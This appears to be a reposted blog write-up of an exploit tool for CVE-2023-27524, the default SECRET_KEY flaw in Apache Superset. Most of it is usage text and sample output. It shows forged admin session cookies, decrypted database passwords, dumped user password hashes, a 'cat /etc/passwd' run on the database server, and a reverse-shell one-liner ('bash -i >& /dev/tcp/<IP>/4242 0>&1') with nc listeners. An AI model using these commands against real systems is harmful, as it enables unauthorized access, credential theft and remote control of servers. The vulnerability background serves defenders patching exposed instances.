
CVE-2023-27524: Apache Superset Auth Bypass and RCE

Author: Khan安全团队
Published: 2024-01-08 11:03:39

Apache Superset, a widely used open-source data visualization and exploration tool, has a security flaw that can lead to authentication bypass and remote code execution (RCE). An attacker who exploits it can obtain administrative privileges on the target server, harvest user credentials, and potentially compromise the data behind it.

The specific issue is an insecure default configuration, tracked as CVE-2023-27524.

The root cause is a predictable Flask SECRET_KEY left at its shipped default after installation, which affected a large number of internet-exposed Apache Superset instances. Although the project has since shipped mitigations, the flaw remains serious for any deployment that has not regenerated the key, because that key is all that protects the session cookie: whoever knows it can sign a session for any user ID.

Official vulnerability description:

Session validation attacks in Apache Superset versions up to and including 2.0.1. Installations that have not altered the default configured SECRET_KEY according to the installation instructions allow an attacker to authenticate and access unauthorized resources. This does not affect Superset administrators who have changed the default value of the SECRET_KEY configuration.

Usage

Install the pip requirements:

```shell
pip3 install -r requirements.txt
```
```text
usage: exploit.py [-h] --url URL [--id ID] [--wordlist WORDLIST] [--validate] [--enum-dbs] [--enum-users] [--cmd CMD]
                  [--revshell REVSHELL] [--db-host]

options:
  -h, --help            show this help message and exit
  --url URL, -u URL     Host URL
  --id ID               User ID to forge session cookie for. Default=1
  --wordlist WORDLIST, -w WORDLIST
                        Specify a wordlist file (default is 10.txt)
  --validate, -v        Validate the presence of vulnerability by login attempt
  --enum-dbs, -dbs      Enumerate databases
  --enum-users, -eu     Enumerate Superset users
  --cmd CMD, -c CMD     Run custom OS command on the database's server.
  --revshell REVSHELL   Specify IP:Port for reverse shell
  --db-host             Run commands or open reverse shell on the database server
```

Validate the vulnerability and try to crack the SECRET_KEY with a custom wordlist

```text
# python3 exploit.py --url http://localhost:8088 -v -w 10k_most_common_passwords.txt 
[+] Session cookie found.
[+] Decoded session cookie: <REDACTED>
[+] Using '10k_most_common_passwords.txt' as a wordlist.
[+] Superset instance is VULNERABLE to CVE-2023-27524.
[+] Using default SECRET_KEY: b'CHANGE_ME_TO_A_COMPLEX_RANDOM_SECRET'
[+] Forged session cookie for user 1: <REDACTED>
[+] Superset Version: 2.0.1
[+] Login successful. Vulnerability is validated.
```

Enumerate databases

```text
# python3 exploit.py -u http://localhost:8088 --enum-dbs      
[+] Session cookie found.
[+] Decoded session cookie:
    {'csrf_token': '5d4c9ad6caf94bc1c652b0fc8e8739d19c45c05a', 'locale': 'en'}
[+] Using default secret keys.
[+] Superset instance is VULNERABLE to CVE-2023-27524.
[+] Secret key found: "b'CHANGE_ME_TO_A_COMPLEX_RANDOM_SECRET'"
[+] Forged session cookie for user 1:
    eyJfdXNlcl9pZCI6MSwidXNlcl9pZCI6MX0.ZPsQ6Q.nKTBZiUq-Cu0iWSLQIUtB2W9HnM
[+] Version 2.0.1 seems vulnerable.
[+] Enumerating databases via API...
[+] Found database: "examples" with password "superset".
[+] Found database: "SQLite".
[+] Enumerating database connection data and cracking password if possible...
+-----------------+---------------------------------------------------+--------------------------+----------------------+
| database_name   | sqlalchemy_uri                                    | password                 | decrypted_password   |
|-----------------+---------------------------------------------------+--------------------------+----------------------|
| examples        | postgresql://superset:XXXXXXXXXX@db:5432/superset | MAqp6AIikZpDM5bMH4MMgA== | superset********     |
| SQLite          | sqlite+pysqlite:////app/superset_home/superset.db |                          |                      |
+-----------------+---------------------------------------------------+--------------------------+----------------------+
[+] Process of enumerating databases finished.
```

Enumerate Superset users

```text
# python3 exploit.py -u http://localhost:8088 --enum-users              
[+] Session cookie found.
[+] Decoded session cookie:
    {'csrf_token': '2a3adb09bac36c330a77c74da1cca27c431779e8', 'locale': 'en'}
[+] Using default secret keys.
[+] Superset instance is VULNERABLE to CVE-2023-27524.
[+] Secret key found: "b'CHANGE_ME_TO_A_COMPLEX_RANDOM_SECRET'"
[+] Forged session cookie for user 1:
    eyJfdXNlcl9pZCI6MSwidXNlcl9pZCI6MX0.ZPsRCQ.qeci7JgO5Lb4AwexB0Qojp5RDbs
[+] Version 2.0.1 seems vulnerable.
[+] Checking existing metadata database connection...
[+] Settings of database with id 1 were successfully modified.
[+] Settings of database with id 2 were successfully modified.
[+] Superset metadata connection is already added with id 2.
[+] Trying to enumerate Superset users...
[+] RESULT:
+------------+--------------------------------------------------------------------------------------------------------+
| username   | password                                                                                               |
|------------+--------------------------------------------------------------------------------------------------------|
| admin      | pbkdf2:sha256:260000$z5y5YnluWzyx4kd2$33c40dfefdea9aedef6ed171a941492516ba49c1ed8ed740d7e05446ce639c0e |
+------------+--------------------------------------------------------------------------------------------------------+
```

Run a custom OS command

On the Superset server:

```shell
# python3 exploit.py --url http://localhost:8088 --cmd 'bash -i >& /dev/tcp/<IP>/4242 0>&1'
```

Note that in this mode the command output cannot be viewed yet, which is why the example pipes a shell back to a listener instead of running a command whose result you want to read.

On the database server:

```text
# python3 exploit.py -u http://localhost:8088 --cmd 'cat /etc/passwd' --db-host

[+] Session cookie found.
[+] Decoded session cookie:
    {'csrf_token': 'c2154d7077f507bd69c791f9d6de49115ba290a3', 'locale': 'en'}
[+] Using default secret keys.
[+] Superset instance is VULNERABLE to CVE-2023-27524.
[+] Secret key found: "b'CHANGE_ME_TO_A_COMPLEX_RANDOM_SECRET'"
[+] Forged session cookie for user 1:
    eyJfdXNlcl9pZCI6MSwidXNlcl9pZCI6MX0.ZPsRMw.haTjE2XBuVjamMvsdg7SemBr3Ig
[+] Version 2.0.1 seems vulnerable.
[+] Trying to run command on the database server...
[+] Settings of database with id 1 were successfully modified.
[+] $ cat /etc/passwd
+-----------------------------------------------------------------------------------+
| cmd_output                                                                        |
|-----------------------------------------------------------------------------------|
| root:x:0:0:root:/root:/bin/bash                                                   |
| daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin                                   |
| <REDACTED>                                                                        |
| postgres:x:999:999::/var/lib/postgresql:/bin/bash                                 |
+-----------------------------------------------------------------------------------+
```

Open a reverse shell

On the Superset server:

```shell
# Terminal 1
nc -lvnp [PORT]

# Terminal 2
python3 exploit.py -u http://localhost:8088 --revshell [IP]:[PORT]
```

On the database server:

```shell
# Terminal 1
nc -lvnp [PORT]

# Terminal 2
python3 exploit.py -u http://localhost:8088 --revshell [IP]:[PORT] --db-host
```
Originally published 2023-12-31 on the Khan安全攻防实验室 WeChat account and shared through the Tencent Cloud self-media program.
